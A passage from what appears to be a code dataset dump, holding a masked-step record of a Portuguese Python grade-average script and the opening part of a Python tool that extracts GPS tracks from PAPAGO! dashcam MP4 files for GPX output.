result.append((element[0], 1))\n else:\n result.append((element[0], int(element[1])))\n return result\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if media >= 6:
print('Parabéns!! Você foi aprovado.')
else:
print('Que pena!! Você foi reprovado.')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
nota1 = float(input('Digite sua primeira nota: '))
nota2 = float(input('Digite sua segunda nota: '))
nota3 = float(input('Digite sua terceira nota: '))
media = (nota1 + nota2 + nota3) / 3
if media >= 6:
print('Parabéns!! Você foi aprovado.')
else:
print('Que pena!! Você foi reprovado.')
<|reserved_special_token_1|>
"""
Faça um algoritmo que solicita ao usuário as notas de três provas. Calcule a média aritmética e
informe se o aluno foi Aprovado ou Reprovado (o aluno é considerado aprovado com a média igual ou superior a 6).
"""
nota1 = float(input("Digite sua primeira nota: "))
nota2 = float(input("Digite sua segunda nota: "))
nota3 = float(input("Digite sua terceira nota: "))
media = (nota1 + nota2 + nota3)/3
if media >= 6:
print("Parabéns!! Você foi aprovado.")
else:
print("Que pena!! Você foi reprovado.")
|
flexible
|
{
"blob_id": "033d1b39dd3ebaa81c8c6c52386909acf076ef47",
"index": 2011,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif media >= 6:\n print('Parabéns!! Você foi aprovado.')\nelse:\n print('Que pena!! Você foi reprovado.')\n",
"step-3": "<mask token>\nnota1 = float(input('Digite sua primeira nota: '))\nnota2 = float(input('Digite sua segunda nota: '))\nnota3 = float(input('Digite sua terceira nota: '))\nmedia = (nota1 + nota2 + nota3) / 3\nif media >= 6:\n print('Parabéns!! Você foi aprovado.')\nelse:\n print('Que pena!! Você foi reprovado.')\n",
"step-4": "\"\"\"\r\nFaça um algoritmo que solicita ao usuário as notas de três provas. Calcule a média aritmética e\r\ninforme se o aluno foi Aprovado ou Reprovado (o aluno é considerado aprovado com a média igual ou superior a 6).\r\n\"\"\"\r\n\r\nnota1 = float(input(\"Digite sua primeira nota: \"))\r\nnota2 = float(input(\"Digite sua segunda nota: \"))\r\nnota3 = float(input(\"Digite sua terceira nota: \"))\r\n\r\nmedia = (nota1 + nota2 + nota3)/3\r\n\r\nif media >= 6:\r\n print(\"Parabéns!! Você foi aprovado.\")\r\nelse:\r\n print(\"Que pena!! Você foi reprovado.\")\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python3
import argparse
import datetime
import io
import math
import os
import pathlib
import re
import struct
import subprocess
import sys
import xml.sax.saxutils
from typing import (Optional, List, Iterable)
# Default value for the GPX track's <type> element when `--track-type' is
# not given on the command line.
_DEFAULT_TRACK_TYPE = 'Dashcam track'
class Arguments(object):
    """Command-line arguments of papago2gpx, parsed and validated.

    Parsing happens in `__init__'; invalid option combinations are
    reported on stderr and terminate the program via `sys.exit(1)'.
    Every option is exposed afterwards through a read-only property.
    """

    def __init__(self):
        # Declare all command-line options.
        parser = argparse.ArgumentParser(
            prog='papago2gpx', description='Extract GPS data from MP4 video\
files created by PAPAGO! dashcams, and format them into a GPX file.')
        parser.add_argument('input_paths', nargs='+',
            help='The path to an input file or directory.',
            metavar='INPUT_PATH')
        parser.add_argument('--name', help='The name of the GPX file to\
output. Default to 16 deciaml digits representing the first GPS record time.',
            metavar='NAME')
        parser.add_argument('--description', help='The description of the GPX\
file to output.', metavar='DESCRIPTION')
        parser.add_argument('--author-name', help='The name of the author of\
the GPX file to output.', metavar='AUTHOR_NAME')
        parser.add_argument('--author-email', help='The Email address of the\
author of the GPX file to output.', metavar='AUTHOR_EMAIL')
        parser.add_argument('--copyright', help="The copyright holder of the\
GPX file to output. Default to `AUTHOR_NAME'.", metavar='COPYRIGHT')
        parser.add_argument('--copyright-year', help="The copyright year of\
the GPX file to output. Default to the year the file is created.",
            metavar='COPYRIGHT_YEAR')
        parser.add_argument('--copyright-license', help='A link to an external\
file containing license text.', metavar='LICENSE')
        parser.add_argument('--keywords', help='Keywords associated with the\
GPX file to output.', metavar='KEYWORDS')
        parser.add_argument('--track-name', help='The name of the track.',
            metavar='TRACK_NAME')
        parser.add_argument(
            '--track-comment', help='The comment of the track.',
            metavar='TRACK_COMMENT')
        parser.add_argument('--track-description', help="The description of\
the track.", metavar='TRACK_DESCRIPTION')
        parser.add_argument(
            '--track-type', default=_DEFAULT_TRACK_TYPE,
            help=f"The type of the track. Default to `{_DEFAULT_TRACK_TYPE}'.")
        parser.add_argument('--uniq', choices=['first', 'last'],
            help='How to process different coordinates\
 recorded at the same timestamp. Default to an error.')
        parser.add_argument('--overwrite', action='store_true',
            help='Allow to overwrite an existing file.')
        args = parser.parse_args()
        # Validate every input path eagerly so a typo fails before any work.
        self._input_paths = []
        for input_path in args.input_paths:
            input_path = pathlib.Path(input_path)
            if not input_path.exists():
                print(f"{input_path}: File does not exist.", file=sys.stderr)
                sys.exit(1)
            self._input_paths.append(input_path)
        self._name = args.name
        self._description = args.description
        self._author_name = args.author_name
        self._author_email = args.author_email
        # The copyright holder defaults to the author name when given.
        self._copyright = args.copyright
        if self._copyright is None and self._author_name is not None:
            self._copyright = self._author_name
        # `--copyright-year' and `--copyright-license' only make sense when
        # a copyright holder is known; the year defaults to the current one.
        self._copyright_year = args.copyright_year
        if self._copyright_year is not None and self._copyright is None:
            print("`--copyright-year' is specified, but `--copyright' is not.",
                file=sys.stderr)
            sys.exit(1)
        if self._copyright_year is None and self._copyright is not None:
            utc_now = datetime.datetime.now(datetime.timezone.utc)
            local_aware_now = utc_now.astimezone()
            self._copyright_year = local_aware_now.year
        self._copyright_license = args.copyright_license
        if self._copyright_license is not None and self._copyright is None:
            print("`--copyright-license' is specified, but `--copyright' is\
 not.", file=sys.stderr)
            sys.exit(1)
        self._keywords = args.keywords
        self._track_name = args.track_name
        self._track_comment = args.track_comment
        self._track_description = args.track_description
        # An explicit empty string for `--track-type' means "no type at all";
        # absence of the option falls back to the default.
        self._track_type = args.track_type
        if self._track_type is None:
            self._track_type = _DEFAULT_TRACK_TYPE
        if self._track_type == '':
            self._track_type = None
        self._how_to_unique = args.uniq
        self._overwrite = args.overwrite

    # Read-only accessors for every parsed option.
    @property
    def input_paths(self) -> List[pathlib.Path]:
        return self._input_paths
    @property
    def name(self) -> Optional[str]:
        return self._name
    @property
    def description(self) -> Optional[str]:
        return self._description
    @property
    def author_name(self) -> Optional[str]:
        return self._author_name
    @property
    def author_email(self) -> Optional[str]:
        return self._author_email
    @property
    def copyright(self) -> Optional[str]:
        return self._copyright
    @property
    def copyright_year(self) -> Optional[int]:
        return self._copyright_year
    @property
    def copyright_license(self) -> Optional[str]:
        return self._copyright_license
    @property
    def keywords(self) -> Optional[str]:
        return self._keywords
    @property
    def track_name(self) -> Optional[str]:
        return self._track_name
    @property
    def track_comment(self) -> Optional[str]:
        return self._track_comment
    @property
    def track_description(self) -> Optional[str]:
        return self._track_description
    @property
    def track_type(self) -> Optional[str]:
        return self._track_type
    @property
    def how_to_unique(self) -> str:
        return self._how_to_unique
    @property
    def overwrite(self) -> bool:
        return self._overwrite
class BrokenMp4FileError(RuntimeError):
    """Raised when an MP4 file's box structure is truncated or inconsistent.

    The former explicit ``__init__`` merely forwarded its message to
    ``super().__init__`` and was removed; ``RuntimeError`` already stores
    the message, so ``BrokenMp4FileError(message)`` behaves identically.
    """
class GpsDataError(RuntimeError):
    """Raised when the embedded GPS data (index or blocks) is missing or invalid.

    The former explicit ``__init__`` merely forwarded its message to
    ``super().__init__`` and was removed; ``RuntimeError`` already stores
    the message, so ``GpsDataError(message)`` behaves identically.
    """
class GpsDataBlockIndex(object):
    """Location (byte offset and length) of one GPS data block in an MP4 file."""

    def __init__(self, position: int, size: int):
        """Store a block's offset and length, rejecting non-positive values."""
        for label, value in (('position', position), ('size', size)):
            if value <= 0:
                raise ValueError(f"An invalid {label}: `{value}'.")
        self._position = position
        self._size = size

    @property
    def position(self) -> int:
        """Byte offset of the block within the file."""
        return self._position

    @property
    def size(self) -> int:
        """Length of the block in bytes."""
        return self._size
def get_gps_data_block_indices(mp4_file: io.FileIO) -> List[GpsDataBlockIndex]:
    """Locate the `moov`/`gps ` box in *mp4_file* and return its block index.

    The PAPAGO! firmware stores a vendor-specific `gps ` box under `moov`
    containing a table of (position, size) pairs, each pointing at one GPS
    data block elsewhere in the file.

    Raises:
        GpsDataError: If no GPS index exists or its contents are invalid.
        BrokenMp4FileError: If the MP4 box structure is truncated or
            inconsistent.
    """
    # Walk the box tree along this path; a matching container is entered,
    # every other box is skipped over.
    target_box_path = ['moov', 'gps ']
    while True:
        box_size = mp4_file.read(4)
        if len(box_size) == 0:
            # Clean EOF at a box boundary: the file simply has no GPS index.
            raise GpsDataError(
                f'{mp4_file.name}: Could not find any GPS data block index.')
        if len(box_size) < 4:
            error_position = format(mp4_file.tell() - len(box_size), '#010x')
            raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:'
                                     ' Expect the size of a box, but got EOF.')
        box_size = int.from_bytes(box_size, 'big')
        box_type = mp4_file.read(4)
        if len(box_type) < 4:
            error_position = format(mp4_file.tell() - len(box_type), '#010x')
            raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:'
                                     ' Expect the type of a box, but got EOF.')
        box_type = box_type.decode('UTF-8')
        if box_size == 0:
            # Size 0 means the box extends to the end of the file.
            box_size = None
            next_position = None
        elif box_size == 1:
            # Size 1 selects the 64-bit `largesize' field that follows.
            box_size = mp4_file.read(8)
            if len(box_size) < 8:
                error_position = format(mp4_file.tell() - len(box_size),
                                        '#010x')
                raise BrokenMp4FileError(
                    f'{mp4_file.name}:{error_position}: Expect the size of a'
                    ' box, but got EOF.')
            box_size = int.from_bytes(box_size, 'big')
            next_position = mp4_file.tell() + box_size - 16
        else:
            next_position = mp4_file.tell() + box_size - 8
        if box_type == target_box_path[0]:
            # Descend into the matching container; stop once `gps ' is found.
            target_box_path.pop(0)
            if len(target_box_path) == 0:
                break
        else:
            if next_position is None:
                raise GpsDataError(f'{mp4_file.name}: Could not find any GPS'
                                   ' data block index.')
            mp4_file.seek(next_position)
            if mp4_file.tell() != next_position:
                raise BrokenMp4FileError(f'{mp4_file.name}: The size of a box'
                                         ' is not equal to the actual one.')
    # Payload of the `gps ' box: a constant 257, a block count, then that
    # many (position, size) pairs of big-endian 32-bit unsigned integers.
    unknown = mp4_file.read(4)
    if len(unknown) < 4:
        error_position = format(mp4_file.tell() - len(unknown), '#010x')
        raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a'
                           ' big-endian 32-bit unsigned integer, but got EOF.')
    unknown = int.from_bytes(unknown, 'big')
    if unknown != 257:
        error_position = format(mp4_file.tell() - 4, '#010x')
        raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect a"
                           f" big-endian 32-bit unsigned integer with value"
                           f" `257', but got `{unknown}'.")
    gps_data_block_count = mp4_file.read(4)
    if len(gps_data_block_count) < 4:
        error_position = format(mp4_file.tell() - len(gps_data_block_count),
                                '#010x')
        raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a'
                           ' big-endian 32-bit unsigned integer, but got EOF.')
    gps_data_block_count = int.from_bytes(gps_data_block_count, 'big')
    gps_data_block_indices = []
    for i in range(gps_data_block_count):
        position = mp4_file.read(4)
        if len(position) < 4:
            error_position = format(mp4_file.tell() - len(position), '#010x')
            raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect the'
                               ' position of a GPS data block, but got EOF.')
        position = int.from_bytes(position, 'big')
        if position < 0:
            # Unreachable for unsigned parsing; kept as a defensive check.
            error_position = format(mp4_file.tell() - 4, '#010x')
            raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect the"
                               f" position of a GPS data block, but got an"
                               f" invalid value `{position}'.")
        size = mp4_file.read(4)
        if len(size) < 4:
            error_position = format(mp4_file.tell() - len(size), '#010x')
            raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect the'
                               ' size of a GPS data block, but got EOF.')
        size = int.from_bytes(size, 'big')
        if size < 0:
            error_position = format(mp4_file.tell() - 4, '#010x')
            raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect the"
                               f" size of a GPS data block, but got an invalid"
                               f" value `{size}'.")
        if position == 0 or size == 0:
            # An all-zero row means the index entry was never written.
            print(f'{mp4_file.name}: Warning: The index of GPS data blocks is'
                  ' not recorded.', file=sys.stderr)
        else:
            gps_data_block_index = GpsDataBlockIndex(position, size)
            gps_data_block_indices.append(gps_data_block_index)
    if mp4_file.tell() != next_position:
        # Bug fix: this branch referenced the undefined name `mp4_file_path',
        # so reaching it raised NameError instead of GpsDataError.
        error_position = format(mp4_file.tell(), '#010x')
        raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect EOF, but'
                           ' find additional data.')
    return gps_data_block_indices
def read_little_endian_single(mp4_file: io.FileIO) -> float:
    """Read a little-endian IEEE 754 single-precision float from `mp4_file`.

    Returns the decoded value.  Raises `GpsDataError` when fewer than four
    bytes remain in the file.
    """
    # Local import: the file's top-level import block is outside this chunk.
    import struct
    data = mp4_file.read(4)
    if len(data) < 4:
        error_position = format(mp4_file.tell() - len(data), '#010x')
        raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a\
little-endian single-precision floating point number, but got EOF.')
    # `struct` decodes every IEEE 754 case correctly.  The previous
    # hand-rolled decoder unconditionally ORed in the implicit leading
    # mantissa bit and applied the normal-number exponent bias, so zeros,
    # subnormals, infinities, and NaNs all decoded wrongly -- notably
    # 0x00000000 became 2**-127 instead of 0.0 (a zero speed is common).
    return struct.unpack('<f', data)[0]
class Time(object):
    """A point in time, normalized to UTC.

    Wraps an aware `datetime` so that comparisons and the ISO 8601
    representation are always performed in UTC.
    """

    def __init__(self, time: datetime.datetime):
        # A naive datetime carries no UTC offset, so normalizing it would
        # silently guess a time zone; reject it instead.
        if time.tzinfo is None:
            raise ValueError(
                "Expect an aware `datetime' object, but got naive one.")
        self._time = time.astimezone(datetime.timezone.utc)

    def as_local_time(self) -> datetime.datetime:
        """Return this time converted to the local time zone."""
        return self._time.astimezone()

    def __repr__(self) -> str:
        # ISO 8601 with a colon inside the UTC offset (`+00:00`); `%z`
        # emits `+0000`, so insert the colon afterwards.  Match `[+-]`
        # (not just `+`) for consistency with `get_local_time_in_iso8601`
        # and so negative offsets would also be colonized, even though
        # `_time` is always UTC here.
        result = self._time.strftime("%Y-%m-%dT%H:%M:%S%z")
        return re.sub('([+-]\\d{2})(\\d{2})$', '\\1:\\2', result)

    def __lt__(self, other) -> bool:
        return self._time < other._time

    def __eq__(self, other) -> bool:
        return self._time == other._time
class Latitude(object):
    """A latitude in decimal degrees, restricted to the range [-90, 90]."""

    def __init__(self, degree: float):
        if degree < -90 or 90 < degree:
            # The `f` prefix was missing here, so the offending value was
            # never interpolated into the error message.
            raise ValueError(f"An invalid latitude degree: `{degree}'.")
        self._degree = degree

    def __repr__(self) -> str:
        # Six decimal places: roughly 0.1 m of precision.
        return format(self._degree, '.6F')

    def __lt__(self, other) -> bool:
        return self._degree < other._degree

    def __eq__(self, other) -> bool:
        return self._degree == other._degree
class Longitude(object):
    """A longitude in decimal degrees, restricted to the range [-180, 180]."""

    def __init__(self, degree: float):
        if degree < -180 or 180 < degree:
            # The `f` prefix was missing here, so the offending value was
            # never interpolated into the error message.
            raise ValueError(f"An invalid longitude degree: `{degree}'.")
        self._degree = degree

    def __repr__(self) -> str:
        # Six decimal places: roughly 0.1 m of precision.
        return format(self._degree, '.6F')

    def __lt__(self, other) -> bool:
        return self._degree < other._degree

    def __eq__(self, other) -> bool:
        return self._degree == other._degree
class Speed(object):
    """A speed expressed in meters per second."""

    def __init__(self, meter_per_second: float):
        self._meter_per_second = meter_per_second

    def __repr__(self) -> str:
        # Two decimal places, fixed-point.
        return f'{self._meter_per_second:.2F}'
class Azimuth(object):
    """An azimuth in decimal degrees, in the half-open range [0, 360)."""

    def __init__(self, degree: float):
        if degree < 0 or 360 <= degree:
            raise ValueError(f"An invalid azimuth degree: `{degree}'.")
        self._degree = degree

    def __repr__(self) -> str:
        # Two decimal places, fixed-point.
        return f'{self._degree:.2F}'
class TrackPoint(object):
    """A single GPS sample: timestamp, fix status, coordinates, speed,
    azimuth, and raw three-axis acceleration readings.

    When there is no GPS fix (`status` is `'V'` or `None`), both
    coordinates must be `None`; with a fix (`'A'`) both must be present.
    """

    def __init__(self, time: Time, status: str, latitude: Optional[Latitude],
                 longitude: Optional[Longitude], speed: Speed,
                 azimuth: Azimuth, x_acceleration: int, y_acceleration: int,
                 z_acceleration: int):
        has_no_fix = status == 'V' or status is None
        if has_no_fix != (latitude is None):
            raise ValueError('Inconsistent arguments:'
                             f' status = {status}, latitude = {latitude}')
        if has_no_fix != (longitude is None):
            raise ValueError('Inconsistent arguments:'
                             f' status = {status}, longitude = {longitude}')
        self._time = time
        self._status = status
        self._latitude = latitude
        self._longitude = longitude
        self._speed = speed
        self._azimuth = azimuth
        self._x_acceleration = x_acceleration
        self._y_acceleration = y_acceleration
        self._z_acceleration = z_acceleration

    @property
    def time(self) -> Time:
        return self._time

    @property
    def status(self) -> str:
        return self._status

    @property
    def latitude(self) -> Optional[Latitude]:
        return self._latitude

    @property
    def longitude(self) -> Optional[Longitude]:
        return self._longitude

    @property
    def speed(self) -> Speed:
        return self._speed

    @property
    def azimuth(self) -> Azimuth:
        return self._azimuth

    @property
    def x_acceleration(self) -> int:
        return self._x_acceleration

    @property
    def y_acceleration(self) -> int:
        return self._y_acceleration

    @property
    def z_acceleration(self) -> int:
        return self._z_acceleration

    @property
    def name(self) -> str:
        """Local-time timestamp compacted to `YYYYMMDDhhmmss`."""
        return self._time.as_local_time().strftime('%Y%m%d%H%M%S')

    def format_as_csv(self) -> str:
        """Render this sample as one CSV row (no trailing newline)."""
        if self._time is None:
            time_cell = ''
        else:
            time_cell = self._time.as_local_time().strftime(
                '%Y/%m/%d %H:%M:%S')
        cells = [
            time_cell,
            self._status if self._status is not None else '',
            str(self._latitude) if self._latitude is not None else '',
            str(self._longitude) if self._longitude is not None else '',
            str(self._speed),
            str(self._azimuth),
            str(self._x_acceleration),
            str(self._y_acceleration),
            str(self._z_acceleration),
        ]
        return ','.join(cells)

    def __repr__(self) -> str:
        latitude = '' if self._latitude is None else str(self._latitude)
        longitude = '' if self._longitude is None else str(self._longitude)
        return f'{self._time},{latitude},{longitude}'

    def __lt__(self, other) -> bool:
        return self._time < other._time

    def __eq__(self, other) -> bool:
        if self._time != other._time:
            return False
        return (self._latitude == other._latitude
                and self._longitude == other._longitude)
class TrackSegment(object):
    """An ordered collection of track points forming one GPX track segment."""

    def __init__(self):
        self._points = []

    def append_track_point(self, track_point: TrackPoint) -> None:
        """Append `track_point` at the end of this segment."""
        self._points.append(track_point)

    def __len__(self) -> int:
        return len(self._points)

    def __iter__(self) -> Iterable[TrackPoint]:
        yield from self._points
# A 112-byte pattern that sometimes appears inside the otherwise-zero
# padding that follows a GPS data block (bytes 420..532 of the padding;
# see `parse_mp4_file`).  Its meaning is unknown, so it is merely
# recognized and tolerated rather than rejected as corruption.
_UNKNOWN_BYTES\
    = b'\x00\x21\x17\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\
\xBC\xC7\x17\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\
\x3C\xDB\x17\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\
\x18\xB5\x18\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\
\xA0\xFE\x19\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\
\x20\xF9\x1B\x00\x00\x00\x00\x00\x80\x01\x00\x00\x01\x00\x00\x00\
\xAC\xB3\x1C\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00'
def parse_mp4_file(mp4_file_path: pathlib.Path) -> List[TrackPoint]:
    """Parse every GPS data block of a dashcam MP4 file into `TrackPoint`s.

    The file's index (read by `get_gps_data_block_indices`) gives the
    position and size of each block.  Every block is then read and
    validated field by field; any structural deviation raises
    `GpsDataError` carrying the offending file offset in hexadecimal.
    """
    track_points = []
    with open(mp4_file_path, 'rb') as mp4_file:
        gps_data_block_indices = get_gps_data_block_indices(mp4_file)
        for gps_data_block_index in gps_data_block_indices:
            # Jump to the start of the indexed block.
            mp4_file.seek(gps_data_block_index.position)
            # NOTE(review): seeking past EOF does not fail and `tell()`
            # reports the requested offset, so this EOF check may never
            # trigger -- confirm with a truncated sample file.
            if mp4_file.tell() != gps_data_block_index.position:
                error_position = gps_data_block_index.position
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' a GPS data block, but got EOF.')
            # Outer block size: big-endian, counted from the start of this
            # size field itself (see `large_block_end` below).
            large_block_size = mp4_file.read(4)
            if len(large_block_size) < 4:
                error_position = format(
                    mp4_file.tell() - len(large_block_size), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
the size of a GPS data block, but got EOF.')
            large_block_size = int.from_bytes(large_block_size, 'big')
            if large_block_size != gps_data_block_index.size:
                error_position = format(mp4_file.tell() - 4, '#010x')
                raise GpsDataError(f'{mp4_file_path}:{error_position}: The\
size of a GPS data block is not equal to the one stored in the index.')
            large_block_end = mp4_file.tell() - 4 + large_block_size
            # Every block starts with the 8-byte ASCII signature
            # `freeGPS ` (trailing space included).
            signature = mp4_file.read(8)
            if len(signature) < 8:
                error_position = format(mp4_file.tell() - len(signature),
                                        '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
the signature of a GPS data block, but got EOF.')
            signature = signature.decode('UTF-8')
            if signature != 'freeGPS ':
                error_position = format(mp4_file.tell() - 8, '#010x')
                raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
`freeGPS ' as the signature of a GPS data block, but got `{signature}'.")
            # Inner (payload) size: little-endian, unlike the outer size,
            # and always expected to be exactly 88 bytes.
            small_block_size = mp4_file.read(4)
            if len(small_block_size) < 4:
                error_position = format(
                    mp4_file.tell() - len(small_block_size), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\
the size of a GPS data block, but got EOF.')
            small_block_size = int.from_bytes(small_block_size, 'little')
            if small_block_size != 88:
                error_position = format(mp4_file.tell() - 4, '#010x')
                raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
`88' as the size of a GPS data block, but got `{small_block_size}'.")
            small_block_end = mp4_file.tell() + small_block_size
            # 32 bytes of mandatory zero padding before the time fields.
            padding = mp4_file.read(32)
            if len(padding) < 32:
                error_position = format(mp4_file.tell() - len(padding),
                                        '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' zero padding, but got EOF.')
            for j, b in enumerate(padding):
                if b != 0:
                    error_position = format(mp4_file.tell() - 32 + j, '#010x')
                    byte = format(b, '#04x')
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect zero padding, but got an invalid byte `{byte}'.")
            # Timestamp fields, each a little-endian 32-bit integer:
            # hour, minute, second, year (offset from 2000), month, day.
            hour = mp4_file.read(4)
            if len(hour) < 4:
                error_position = format(mp4_file.tell() - len(hour), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' the hour of time, but got EOF.')
            hour = int.from_bytes(hour, 'little')
            if hour < 0 or 24 <= hour:
                error_position = format(mp4_file.tell() - 4, '#010x')
                raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
the hour of time, but got an invalid value `{hour}'.")
            minute = mp4_file.read(4)
            if len(minute) < 4:
                error_position = format(mp4_file.tell() - len(minute), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' the minute of time, but got EOF.')
            minute = int.from_bytes(minute, 'little')
            if minute < 0 or 60 <= minute:
                error_position = format(mp4_file.tell() - 4, '#010x')
                raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
the minute of time, but got an invalid value `{minute}'.")
            second = mp4_file.read(4)
            if len(second) < 4:
                error_position = format(mp4_file.tell() - len(second), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' the second of time, but got EOF.')
            second = int.from_bytes(second, 'little')
            if second < 0 or 60 <= second:
                error_position = format(mp4_file.tell() - 4, '#010x')
                raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
the second of time, but got an invalid value `{second}'.")
            year = mp4_file.read(4)
            if len(year) < 4:
                error_position = format(mp4_file.tell() - len(year), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' the year of time, but got EOF.')
            year = int.from_bytes(year, 'little')
            # A zero year marks a sample without any GPS timestamp; every
            # other time field must then also be zero.
            if year == 0:
                error_position = format(mp4_file.tell() - 4, '#010x')
                if hour != 0:
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:"
                                       " `year == 0' but `hour != 0'.")
                if minute != 0:
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:"
                                       " `year == 0' but `minute != 0'.")
                if second != 0:
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:"
                                       " `year == 0' but `second != 0'.")
            else:
                # The year is stored as an offset from 2000.
                year += 2000
            month = mp4_file.read(4)
            if len(month) < 4:
                error_position = format(mp4_file.tell() - len(month), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' the month of time, but got EOF.')
            month = int.from_bytes(month, 'little')
            if month == 0:
                # NOTE(review): `error_position` here is left over from an
                # earlier read (it is not recomputed for this field) --
                # the reported offset may be stale; confirm.
                if year != 0:
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:"
                                       " `year != 0' but `month == 0'.")
                assert(hour == 0)
                assert(minute == 0)
                assert(second == 0)
            elif month < 1 or 12 < month:
                error_position = format(mp4_file.tell() - 4, '#010x')
                raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
the month of time, but got an invalid value `{month}'.")
            day = mp4_file.read(4)
            if len(day) < 4:
                error_position = format(mp4_file.tell() - len(day), '#010x')
                raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'
                                   ' the day of time, but got EOF.')
            day = int.from_bytes(day, 'little')
            if day == 0:
                # NOTE(review): `error_position` may be stale here too.
                if year != 0:
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:"
                                       " `year != 0' but `day == 0'.")
                assert(month == 0)
                assert(hour == 0)
                assert(minute == 0)
                assert(second == 0)
            elif day < 1 or 31 < day:
                error_position = format(mp4_file.tell() - 4, '#010x')
                raise GpsDataError(f"{mp4_file.name}:{error_position}: Expect\
the day of time, but got an invalid value `{day}'.")
            if year == 0:
                assert(month == 0)
                assert(day == 0)
                assert(hour == 0)
                assert(minute == 0)
                assert(second == 0)
                time = None
            else:
                # Build an aware timestamp by substituting the decoded
                # fields into the current local time; only the tzinfo of
                # `now` is actually kept.  NOTE(review): this assumes the
                # recording was made in this machine's time zone --
                # confirm against the camera's behavior.
                time = datetime.datetime.now(datetime.timezone.utc)
                time = time.astimezone()
                time = time.replace(
                    year=year, month=month, day=day, hour=hour, minute=minute,
                    second=second, microsecond=0)
                time = Time(time)
            if time is None:
                # Samples without a timestamp store 4 bytes of zero
                # padding where the status/type characters would be.
                padding = mp4_file.read(4)
                if len(padding) < 4:
                    error_position = format(mp4_file.tell() - len(padding),
                                            '#010x')
                    raise GpsDataError(f'{mp4_file.name}:{error_position}:'
                                       ' Expect zero-padding, but got EOF.')
                padding = int.from_bytes(padding, 'little')
                if padding != 0:
                    error_position = format(mp4_file.tell() - 4, '#010x')
                    raise GpsDataError(
                        f"{mp4_file.name}:{error_position}: Expect"
                        f" zero-padding, but got `{padding}'.")
                status = None
                latitude_type = '0'
                longitude_type = '0'
            else:
                # Status character: `A` appears to mean a valid fix and
                # `V` no fix (NMEA RMC convention) -- coordinates are only
                # present for `A`.
                status = mp4_file.read(1)
                if len(status) < 1:
                    error_position = format(mp4_file.tell() - len(status),
                                            '#010x')
                    raise GpsDataError(
                        f'{mp4_file.name}:{error_position}: Expect a status'
                        ' character, but got EOF.')
                status = status.decode('UTF-8')
                if status not in ('A', 'V'):
                    error_position = format(mp4_file.tell() - 1, '#010x')
                    raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect `A' or `V' as a status character, but got an invalid character\
`{status}'.")
                # Hemisphere characters: `N`/`S` and `E`/`W` with a fix,
                # the literal character `0` without one.
                latitude_type = mp4_file.read(1)
                if len(latitude_type) < 1:
                    error_position = format(
                        mp4_file.tell() - len(latitude_type), '#010x')
                    raise GpsDataError(f'{mp4_file.name}:{error_position}:\
Expect a latitude type, but got EOF.')
                latitude_type = latitude_type.decode('UTF-8')
                if status == 'A':
                    if latitude_type not in ('N', 'S'):
                        error_position = format(mp4_file.tell() - 1, '#010x')
                        raise GpsDataError(
                            f"{mp4_file.name}:{error_position}: Expect `N' or\
`S' as a latitude type, but got an invalid character `{latitude_type}'.")
                else:
                    assert(status == 'V')
                    if latitude_type != '0':
                        error_position = format(mp4_file.tell() - 1, '#010x')
                        raise GpsDataError(f"{mp4_file.name}:{error_position}:\
Expect `0' as a latitude type, but got an invalid character\
`{latitude_type}'.")
                longitude_type = mp4_file.read(1)
                if len(longitude_type) < 1:
                    error_position = format(
                        mp4_file.tell() - len(longitude_type), '#010x')
                    raise GpsDataError(f'{mp4_file.name}:{error_position}:\
Expect a longitude type, but got EOF.')
                longitude_type = longitude_type.decode('UTF-8')
                if status == 'A':
                    if longitude_type not in ('E', 'W'):
                        error_position = format(mp4_file.tell() - 1, '#010x')
                        raise GpsDataError(
                            f"{mp4_file.name}:{error_position}: Expect `E' or\
